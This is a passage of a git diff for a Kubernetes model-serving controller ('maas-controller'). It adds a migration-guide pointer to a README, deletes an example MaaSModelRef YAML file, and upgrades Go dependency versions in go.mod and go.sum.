 | AuthPolicy (generated) | llm | maas-controller | Per-model auth, one per (MaaSAuthPolicy, model) pair |
@@ -154,3 +154,13 @@ To move from old flow to new flow on an existing cluster:
    - Create a `MaaSSubscription` CR with the token rate limits
 3. The old `gateway-token-rate-limits` and `tier-to-group-mapping` ConfigMap can be removed
 4. The MaaS API is still needed for token minting and model listing (unchanged)
+
+**For detailed step-by-step migration instructions, see [Migration Guide: Tier-Based to Subscription Model](../../docs/content/migration/tier-to-subscription.md)**.
+
+The migration guide includes:
+- Zero-downtime migration strategy
+- Automated migration script (`scripts/migrate-tier-to-subscription.sh`)
+- Conversion worksheet
+- Rollback procedures
+- Troubleshooting common issues
+- ODH Model Controller considerations
diff --git a/maas-controller/examples/maas-model.yaml b/maas-controller/examples/maas-model.yaml
deleted file mode 100644
index b23d0e66d..000000000
--- a/maas-controller/examples/maas-model.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-# MaaSModelRef that registers the simulator LLMInferenceService.
-# The LLMIS name must match the deployed resource (e.g. from docs/samples/models/simulator:
-# namePrefix facebook-opt-125m- + name simulated -> facebook-opt-125m-simulated in namespace llm).
-apiVersion: maas.opendatahub.io/v1alpha1
-kind: MaaSModelRef
-metadata:
-  name: facebook-opt-125m-simulated
-  namespace: opendatahub
-spec:
-  modelRef:
-    kind: LLMInferenceService
-    name: facebook-opt-125m-simulated
-    namespace: llm
diff --git a/maas-controller/go.mod b/maas-controller/go.mod
index 9b360f139..356764b74 100644
--- a/maas-controller/go.mod
+++ b/maas-controller/go.mod
@@ -14,29 +14,30 @@ require (
 )
 
 require (
-	cel.dev/expr v0.19.2 // indirect
+	cel.dev/expr v0.25.1 // indirect
 	cloud.google.com/go v0.118.3 // indirect
 	cloud.google.com/go/auth v0.15.0 // indirect
 	cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect
-	cloud.google.com/go/compute/metadata v0.6.0 // indirect
+	cloud.google.com/go/compute/metadata v0.9.0 // indirect
 	cloud.google.com/go/iam v1.4.1 // indirect
 	cloud.google.com/go/monitoring v1.24.1 // indirect
 	cloud.google.com/go/storage v1.51.0 // indirect
-	github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.25.0 // indirect
+	github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect
 	github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0 // indirect
 	github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.51.0 // indirect
 	github.com/aws/aws-sdk-go v1.55.6 // indirect
 	github.com/beorn7/perks v1.0.1 // indirect
 	github.com/cespare/xxhash/v2 v2.3.0 // indirect
-	github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42 // indirect
+	github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 // indirect
 	github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect
 	github.com/emicklei/go-restful/v3 v3.12.2 // indirect
-	github.com/envoyproxy/go-control-plane/envoy v1.32.4 // indirect
-	github.com/envoyproxy/protoc-gen-validate v1.2.1 // indirect
+	github.com/envoyproxy/go-control-plane/envoy v1.36.0 // indirect
+	github.com/envoyproxy/protoc-gen-validate v1.3.0 // indirect
 	github.com/evanphx/json-patch/v5 v5.9.11 // indirect
 	github.com/felixge/httpsnoop v1.0.4 // indirect
 	github.com/fsnotify/fsnotify v1.9.0 // indirect
 	github.com/fxamacker/cbor/v2 v2.8.0 // indirect
+	github.com/go-jose/go-jose/v4 v4.1.3 // indirect
 	github.com/go-logr/stdr v1.2.2 // indirect
 	github.com/go-logr/zapr v1.3.0 // indirect
 	github.com/go-openapi/jsonpointer v0.21.1 // indirect
@@ -68,9 +69,10 @@ require (
 	github.com/prometheus/common v0.64.0 // indirect
 	github.com/prometheus/procfs v0.16.1 // indirect
 	github.com/spf13/pflag v1.0.6 // indirect
+	github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect
 	github.com/x448/float16 v0.8.4 // indirect
 	go.opentelemetry.io/auto/sdk v1.2.1 // indirect
-	go.opentelemetry.io/contrib/detectors/gcp v1.34.0 // indirect
+	go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect
 	go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.59.0 // indirect
 	go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.60.0 // indirect
 	go.opentelemetry.io/otel v1.40.0 // indirect
@@ -80,21 +82,21 @@ require (
 	go.opentelemetry.io/otel/trace v1.40.0 // indirect
 	go.uber.org/multierr v1.11.0 // indirect
 	go.uber.org/zap v1.27.0 // indirect
-	golang.org/x/crypto v0.39.0 // indirect
-	golang.org/x/net v0.41.0 // indirect
-	golang.org/x/oauth2 v0.30.0 // indirect
-	golang.org/x/sync v0.15.0 // indirect
+	golang.org/x/crypto v0.46.0 // indirect
+	golang.org/x/net v0.48.0 // indirect
+	golang.org/x/oauth2 v0.34.0 // indirect
+	golang.org/x/sync v0.19.0 // indirect
 	golang.org/x/sys v0.40.0 // indirect
-	golang.org/x/term v0.32.0 // indirect
-	golang.org/x/text v0.26.0 // indirect
+	golang.org/x/term v0.38.0 // indirect
+	golang.org/x/text v0.32.0 // indirect
 	golang.org/x/time v0.12.0 // indirect
 	gomodules.xyz/jsonpatch/v2 v2.5.0 // indirect
 	google.golang.org/api v0.228.0 // indirect
 	google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb // indirect
-	google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb // indirect
-	google.golang.org/genproto/googleapis/rpc v0.0.0-20250313205543-e70fdf4c4cb4 // indirect
-	google.golang.org/grpc v1.71.1 // indirect
-	google.golang.org/protobuf v1.36.6 // indirect
+	google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect
+	google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect
+	google.golang.org/grpc v1.79.3 // indirect
+	google.golang.org/protobuf v1.36.10 // indirect
 	gopkg.in/evanphx/json-patch.v4 v4.12.0 // indirect
 	gopkg.in/go-playground/validator.v9 v9.31.0 // indirect
 	gopkg.in/inf.v0 v0.9.1 // indirect
diff --git a/maas-controller/go.sum b/maas-controller/go.sum
index e3660ea1f..2d5e2a7bd 100644
--- a/maas-controller/go.sum
+++ b/maas-controller/go.sum
@@ -1,5 +1,5 @@
-cel.dev/expr v0.19.2 h1:V354PbqIXr9IQdwy4SYA4xa0HXaWq1BUPAGzugBY5V4=
-cel.dev/expr v0.19.2/go.mod h1:MrpN08Q+lEBs+bGYdLxxHkZoUSsCp0nSKTs0nTymJgw=
+cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4=
+cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4=
 cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
 cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
 cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU=
@@ -13,8 +13,8 @@ cloud.google.com/go/auth v0.15.0/go.mod h1:WJDGqZ1o9E9wKIL+IwStfyn/+s59zl4Bi+1KQ
 cloud.google.com/go/auth/oauth2adapt v0.2.8 h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc=
 cloud.google.com/go/auth/oauth2adapt v0.2.8/go.mod h1:XQ9y31RkqZCcwJWNSx2Xvric3RrU88hAYYbjDWYDL+c=
 cloud.google.com/go/bigquery v1.0.1/go.mod h1:i/xbL2UlR5RvWAURpBYZTtm/cXjCha9lbfbpx4poX+o=
-cloud.google.com/go/compute/metadata v0.6.0 h1:A6hENjEsCDtC1k8byVsgwvVcioamEHvZ4j01OwKxG9I=
-cloud.google.com/go/compute/metadata v0.6.0/go.mod h1:FjyFAW1MW0C203CEOMDTu3Dk1FlqW3Rga40jzHL4hfg=
+cloud.google.com/go/compute/metadata v0.9.0 h1:pDUj4QMoPejqq20dK0Pg2N4yG9zIkYGdBtwLoEkH9Zs=
+cloud.google.com/go/compute/metadata v0.9.0/go.mod h1:E0bWwX5wTnLPedCKqk3pJmVgCBSM6qQI1yTBdEb3C10=
 cloud.google.com/go/datastore v1.0.0/go.mod h1:LXYbyblFSglQ5pkeyhO+Qmw7ukd3C+pD7TKLgZqpHYE=
 cloud.google.com/go/iam v1.4.1 h1:cFC25Nv+u5BkTR/BT1tXdoF2daiVbZ1RLx2eqfQ9RMM=
 cloud.google.com/go/iam v1.4.1/go.mod h1:2vUEJpUG3Q9p2UdsyksaKpDzlwOrnMzS30isdReIcLM=
@@ -30,8 +30,8 @@ cloud.google.com/go/trace v1.11.3 h1:c+I4YFjxRQjvAhRmSsmjpASUKq88chOX854ied0K/pE
 cloud.google.com/go/trace v1.11.3/go.mod h1:pt7zCYiDSQjC9Y2oqCsh9jF4GStB/hmjrYLsxRR27q8=
 github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
 github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
-github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.25.0 h1:3c8yed4lgqTt+oTQ+JNMDo+F4xprBf+O/il4ZC0nRLw=
-github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.25.0/go.mod h1:obipzmGjfSjam60XLwGfqUkJsfiheAl+TUjG+4yzyPM=
+github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c=
+github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0=
 github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0 h1:fYE9p3esPxA/C0rQ0AHhP0drtPXDRhaWiwg1DPqO7IU=
 github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0/go.mod h1:BnBReJLvVYx2CS/UHOgVz2BXKXD9wsQPxZug20nZhd0=
 github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/cloudmock v0.51.0 h1:OqVGm6Ei3x5+yZmSJG1Mh2NwHvpVmZ08CB5qJhT9Nuk=
@@ -47,22 +47,22 @@ github.com/blendle/zapdriver v1.3.1/go.mod h1:mdXfREi6u5MArG4j9fewC+FGnXaBR+T4Ox
 github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
 github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
 github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
-github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42 h1:Om6kYQYDUk5wWbT0t0q6pvyM49i9XZAv9dDrkDA7gjk=
-github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42/go.mod h1:W+zGtBO5Y1IgJhy4+A9GOqVhqLpfZi+vwmdNXUehLA8=
+github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w=
+github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI=
 github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM=
 github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 github.com/emicklei/go-restful/v3 v3.12.2 h1:DhwDP0vY3k8ZzE0RunuJy8GhNpPL6zqLkDf9B/a0/xU=
 github.com/emicklei/go-restful/v3 v3.12.2/go.mod h1:6n3XBCmQQb25CM2LCACGz8ukIrRry+4bhvbpWn3mrbc=
-github.com/envoyproxy/go-control-plane v0.13.4 h1:zEqyPVyku6IvWCFwux4x9RxkLOMUL+1vC9xUFv5l2/M=
-github.com/envoyproxy/go-control-plane v0.13.4/go.mod h1:kDfuBlDVsSj2MjrLEtRWtHlsWIFcGyB2RMO44Dc5GZA=
-github.com/envoyproxy/go-control-plane/envoy v1.32.4 h1:jb83lalDRZSpPWW2Z7Mck/8kXZ5CQAFYVjQcdVIr83A=
-github.com/envoyproxy/go-control-plane/envoy v1.32.4/go.mod h1:Gzjc5k8JcJswLjAx1Zm+wSYE20UrLtt7JZMWiWQXQEw=
+github.com/envoyproxy/go-control-plane v0.14.0 h1:hbG2kr4RuFj222B6+7T83thSPqLjwBIfQawTkC++2HA=
+github.com/envoyproxy/go-control-plane v0.14.0/go.mod h1:NcS5X47pLl/hfqxU70yPwL9ZMkUlwlKxtAohpi2wBEU=
+github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g=
+github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98=
 github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI=
 github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4=
-github.com/envoyproxy/protoc-gen-validate v1.2.1 h1:DEo3O99U8j4hBFwbJfrz9VtgcDfUKS7KJ7spH3d86P8=
-github.com/envoyproxy/protoc-gen-validate v1.2.1/go.mod h1:d/C80l/jxXLdfEIhX1W2TmLfsJ31lvEjwamM4DxlWXU=
+github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4=
+github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA=
 github.com/evanphx/json-patch v5.9.0+incompatible h1:fBXyNpNMuTTDdquAq/uisOr2lShz4oaXpDTX2bLe7ls=
 github.com/evanphx/json-patch v5.9.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk=
 github.com/evanphx/json-patch/v5 v5.9.11 h1:/8HVnzMq13/3x9TPvjG08wUGqBTmZBsCWzjTM0wiaDU=
@@ -73,6 +73,8 @@ github.com/fsnotify/fsnotify v1.9.0 h1:2Ml+OJNzbYCTzsxtv8vKSFD9PbJjmhYF14k/jKC7S
 github.com/fsnotify/fsnotify v1.9.0/go.mod h1:8jBTzvmWwFyi3Pb8djgCCO5IBqzKJ/Jwo8TRcHyHii0=
 github.com/fxamacker/cbor/v2 v2.8.0 h1:fFtUGXUzXPHTIUdne5+zzMPTfffl3RD5qYnkY40vtxU=
 github.com/fxamacker/cbor/v2 v2.8.0/go.mod h1:vM4b+DJCtHn+zz7h3FFp/hDAI9WNWCsZj23V5ytsSxQ=
+github.com/go-jose/go-jose/v4 v4.1.3 h1:CVLmWDhDVRa6Mi/IgCgaopNosCaHz7zrMeF9MlZRkrs=
+github.com/go-jose/go-jose/v4 v4.1.3/go.mod h1:x4oUasVrzR7071A4TnHLGSPpNOm2a21K9Kf04k1rs08=
 github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
 github.com/go-logr/logr v1.4.3 h1:CjnDlHq8ikf6E492q6eKboGOC0T8CDaOvkHCIg8idEI=
 github.com/go-logr/logr v1.4.3/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY=
@@ -198,6 +200,8 @@ github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0t
 github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc=
 github.com/spf13/pflag v1.0.6 h1:jFzHGLGAlb3ruxLB8MhbI6A8+AQX/2eW4qeyNZXNp2o=
 github.com/spf13/pflag v1.0.6/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
+github.com/spiffe/go-spiffe/v2 v2.6.0 h1:l+DolpxNWYgruGQVV0xsfeya3CsC7m8iBzDnMpsbLuo=
+github.com/spiffe/go-spiffe/v2 v2.6.0/go.mod h1:gm2SeUoMZEtpnzPNs2Csc0D/gX33k1xIx7lEzqblHEs=
 github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
 github.com/stretchr/objx v0.5.2 h1:xuMeJ0Sdp5ZMRXx/aWO6RZxdr3beISkG5/G/aIRr3pY=
 github.com/stretchr/objx v0.5.2/go.mod h1:FRsXN1f5AsAjCGJKqEizvkpNtU+EGNCLh3NxZ/8L+MA=
@@ -212,8 +216,8 @@ go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU=
 go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8=
 go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64=
 go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y=
-go.opentelemetry.io/contrib/detectors/gcp v1.34.0 h1:JRxssobiPg23otYU5SbWtQC//snGVIM3Tx6QRzlQBao=
-go.opentelemetry.io/contrib/detectors/gcp v1.34.0/go.mod h1:cV4BMFcscUR/ckqLkbfQmF0PRsq8w/lMGzdbCSveBHo=
+go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE=
+go.opentelemetry.io/contrib/detectors/gcp v1.39.0/go.mod h1:t/OGqzHBa5v6RHZwrDBJ2OirWc+4q/w2fTbLZwAKjTk=
 go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.59.0 h1:rgMkmiGfix9vFJDcDi1PK8WEQP4FLQwLDfhp5ZLpFeE=
 go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.59.0/go.mod h1:ijPqXp5P6IRRByFVVg9DY8P5HkxkHE5ARIa+86aXPf4=
 go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.60.0 h1:sbiXRNDSWJOTobXh5HyQKjq6wUC5tNybqjIqDpAY4CU=
@@ -242,8 +246,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
 golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
-golang.org/x/crypto v0.39.0 h1:SHs+kF4LP+f+p14esP5jAoDpHU8Gu/v9lFRK6IT5imM=
-golang.org/x/crypto v0.39.0/go.mod h1:L+Xg3Wf6HoL4Bn4238Z6ft6KfEpN0tJGo53AAPC632U=
+golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU=
+golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0=
 golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
 golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8=
 golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js=
@@ -255,8 +259,8 @@ golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHl
 golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE=
 golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
 golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
-golang.org/x/mod v0.25.0 h1:n7a+ZbQKQA/Ysbyb0/6IbB1H/X41mKgbhfv7AfG/44w=
-golang.org/x/mod v0.25.0/go.mod h1:IXM97Txy2VM4PJ3gI61r1YEk/gAj6zAHN3AdZt6S9Ww=
+golang.org/x/mod v0.30.0 h1:fDEXFVZ/fmCKProc/yAXXUijritrDzahmwwefnjoPFk=
+golang.org/x/mod v0.30.0/go.mod h1:lAsf5O2EvJeSFMiBxXDki7sCgAxEUcZHXoXMKT4GJKc=
 golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
 golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
 golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
@@ -269,13 +273,13 @@ golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR
 golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
-golang.org/x/net v0.41.0 h1:vBTly1HeNPEn3wtREYfy4GZ/NECgw2Cnl+nK6Nz3uvw=
-golang.org/x/net v0.41.0/go.mod h1:B/K4NNqkfmg07DQYrbwvSluqCJOOXwUjeb/5lOisjbA=
+golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU=
+golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY=
 golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
 golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
 golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
-golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI=
-golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU=
+golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw=
+golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA=
 golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
@@ -283,8 +287,8 @@ golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJ
 golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.15.0 h1:KWH3jNZsfyT6xfAfKiz6MRNmd46ByHDYaZ7KSkCtdW8=
-golang.org/x/sync v0.15.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA=
+golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4=
+golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
 golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
 golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
 golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
@@ -296,14 +300,14 @@ golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.40.0 h1:DBZZqJ2Rkml6QMQsZywtnjnnGvHza6BTfYFWY9kjEWQ=
 golang.org/x/sys v0.40.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
-golang.org/x/term v0.32.0 h1:DR4lr0TjUs3epypdhTOkMmuF5CDFJ/8pOnbzMZPQ7bg=
-golang.org/x/term v0.32.0/go.mod h1:uZG1FhGx848Sqfsq4/DlJr3xGGsYMu/L5GW4abiaEPQ=
+golang.org/x/term v0.38.0 h1:PQ5pkm/rLO6HnxFR7N2lJHOZX6Kez5Y1gDSJla6jo7Q=
+golang.org/x/term v0.38.0/go.mod h1:bSEAKrOT1W+VSu9TSCMtoGEOUcKxOKgl3LE5QEF/xVg=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
 golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
-golang.org/x/text v0.26.0 h1:P42AVeLghgTYr4+xUnTRKDMqpar+PtX7KWuNQL21L8M=
-golang.org/x/text v0.26.0/go.mod h1:QK15LZJUUQVJxhz7wXgxSy/CJaTFjd0G+YLonydOVQA=
+golang.org/x/text v0.32.0 h1:ZD01bjUt1FQ9WJ0ClOL5vxgxOI/sVCNgX1YtKwcY0mU=
+golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY=
 golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
 golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
